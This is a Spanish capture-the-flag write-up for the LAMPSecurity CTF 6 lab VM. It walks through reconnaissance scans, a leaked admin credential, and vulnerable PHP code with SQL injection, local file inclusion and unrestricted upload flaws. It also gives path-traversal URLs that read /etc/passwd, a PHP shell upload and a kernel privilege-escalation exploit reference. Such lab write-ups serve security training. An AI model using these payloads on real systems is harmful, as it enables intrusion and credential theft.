Upload
el-hacklab
View
218
Download
2
Embed Size (px)
DESCRIPTION
Solucionario del LAMPSecurity: CTF 6 Challenge por @killr00t ganador del reto
Citation preview
SOLUCIONARIO CTF6LAMPSecurity
Tool : WhatWebResultado :http://192.168.1.72 [200]Meta-Author[Justin C. Klein Keane], HTTPServer[CentOS][Apache/2.2.3 (CentOS)], Apache[2.2.3]IP[192.168.1.72]PHP[5.2.6]X-Powered-By[PHP/5.2.6]Cookies[PHPSESSID]Title[CTF 6 - Widgets Inc.] [email protected]@[email protected]@[email protected]@[email protected][RESERVED][ZZ]
Tool : niktoResultado :---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)+ Number of sections in the version string differ from those in the database, the server reports: apache/2.2.3 while the database has: 2.2.14. This may cause false positives.+ Retrieved X-Powered-By header: PHP/5.2.6+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.+ OSVDB-3092: /files/: This might be interesting...+ OSVDB-3092: /lib/: This might be interesting...+ OSVDB-3092: /mail/: This might be interesting...+ OSVDB-3092: /phpmyadmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.+ OSVDB-3268: /sql/: Directory indexing is enabled: /sql/+ OSVDB-3092: /manual/: Web server manual found.+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons+ OSVDB-3268: /manual/images/: Directory indexing is enabled: /manual/images+ OSVDB-3268: /docs/: Directory indexing is enabled: /docs+ OSVDB-3233: /icons/README: Apache default file found.
• 3818 items checked: 16 item(s) reported on remote host
•
Directorios
Tool : DirbusterResultado :
• /cgi-bin• /files• /templates• /icons• /docs• /icons• /mail• /js• /templates
Tool : niktoResultado :
• /files• /lib• /mail• /phpmyadmin• /sql• /manual• /docs• /icons
Archivos De Interes
• /sql/db.sqlINSERT INTO user SET user_id = 1, user_username='admin', user_password=md5('adminpass');
User => adminPass => 25e4ee4e9229397b6b17776bfceaf8e7 => adminpassBDD => cmsTabla => user
• /docs/code_backup.tgz
• /conf/config.ini
• /logs/log.log
2009-06-28 13:06:09 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1%20from%20dual2009-06-28 13:06:09 Problem with event select: . The used SELECT statements have a different number of columns2009-06-28 13:06:28 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1,1%20from%20dual2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 12009-06-28 13:06:43 172.16.61.132 called id=4%20UNION%20select%20version,1,1,1,1,1,1%20from%20dual2009-06-28 13:06:43 Problem with event select: . Unknown column 'version' in 'field list'2009-06-28 13:06:52 172.16.61.132 called id=4%20UNION%20select%20version(),1,1,1,1,1,1%20from%20dual2009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 12009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 12009-06-28 13:06:13 172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,7%20from%20dual2009-06-28 13:06:13 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 12009-06-28 13:06:13 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 12009-06-28 13:06:30 172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,version()%20from%20dual2009-06-28 13:06:30 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,version() from dual' at line 1
Nota: en este backup ya se habia identificado algunas vulnerabilidades, no sobra mirar las peticiones realizadas y asi escalar mas rapido
Identificacion de Vulnerabilidades (code_backup.tgz)
File : /actions/login.phpCode :-----------------------------------------------------------------------------------------------------------------------------------------------if (isset($_POST['username']) && isset($_POST['password'])) {
$sql = "select user_id from user where user_username = '" . $_POST['username'] . "'";
$query = mysql_query($sql) or die("Query error with $sql: " . mysql_error());if ($query && mysql_num_rows($query) > 0) {
//user exists$uname = mysql_fetch_object($query);$sql = "select * from user where user_id = " . $uname->user_id .
" AND user_password = md5('" . $_POST['password'] . "')";$query = mysql_query($sql)
or $log->append("Query error in login $sql<hr/> " . mysql_error());$retval = array();if (! $query) {
//no return value}else {
$retval = mysql_fetch_object($query);}
}
if (isset($retval->user_id)) {setcookie("logged_in", 1, time()+3600);setcookie("user_id", $retval->user_id, time()+3600);setcookie("hash", $retval->user_password, time()+3600);$logged_in = 1;
}}
if ($logged_in) include_once('templates/logged_in.tpl');
else include_once('templates/'.$_GET['action'].'.tpl');
Vulnerabilidades : SQL InjectionVariables Vulnerables : username, passwordDescripcion Vuln :Variables no filtradas, permitiendo interactuar con la base de datos y extraer información se valida los parametros enviados directamente, inicialmente la variable username y si existe se valida la segunda variable password , ambas son vulnerables
Vulnerabilidades : Local File IncludeVariables Vulnerables : actionDescripcion Vuln : Permite incluir por GET ficheros fuera del directorio WebExploit : /actions/login.php?action=../../../../../etc/passwd%00
File : /actions/add_event.phpCode :
if (! $logged_in) header("Location:index.php");
$log->append("Adding file!") or die("Couldn't append to log for some reason!");
if (isset($_POST['title'])) {if (isset($_FILES['upload'])) {
$uploaddir = 'files/';$uploadfile = $uploaddir . basename($_FILES['upload']['name']);if (! move_uploaded_file($_FILES['upload']['tmp_name'], $uploadfile)) {
$log->append("Log upload problem with file array: $_FILES");$log->append("Upload file name: $uploadfile");$log->append("Upload file tmp name: " . $_FILES['upload']['tmp_name']);
}}
$sql = "insert into event set event_title='" . $_POST['title'] . "',
event_body='" . addslashes($_POST['body']) . "',event_file='" . $uploadfile . "',user_id = " . $_COOKIE['user_id'];
mysql_query($sql) or $log->append("Problem with insert. " . mysql_error());}include_once('templates/'.$_GET['action'].'.tpl');
Vulnerabilidades : Local File IncludeVariables Vulnerables : actionDescripcion Vuln : Permite incluir por GET ficheros fuera del directorio WebExploit : /actions/add_event.php?action=../../../../../etc/passwd%00
Vulnerabilidades : Upload de archivosDescripcion Vuln : Permite subir archivos que me permiten ejecutar comandos de sistema operativo, esto
se debe al no validar en el codigo ninguna extencion de archivo.
Nota: Todos los archivos tienen problemas de programació, solo usare este ultimo archivo para subir la shell directamente y escalar privilegios.
Explotacion y Escalada de Privilegios
File : /actions/add_event.phpExploit : upload de archivosDescripcion : se escoge una shell php y se agrega el evento desde el logeo del CMS
• LOGIN EN EL CMS
User: adminPass: adminpass
Nota :Estos datos ya fueron recogidos desde el archivo sql encontrado.
• AGREGAR EVENTOS:En esta parte hay un menu en el cual ya vimos el codigo vulnerable que nos permite subir la shell directamente
Nos da una serie de exploits locales que podemos utilizar, utilizare : http://www.exploit-db.com/exploits/8478/es el unico que me funciono, pero hay varios para esa version del kernel pero como digo solo me funciono este.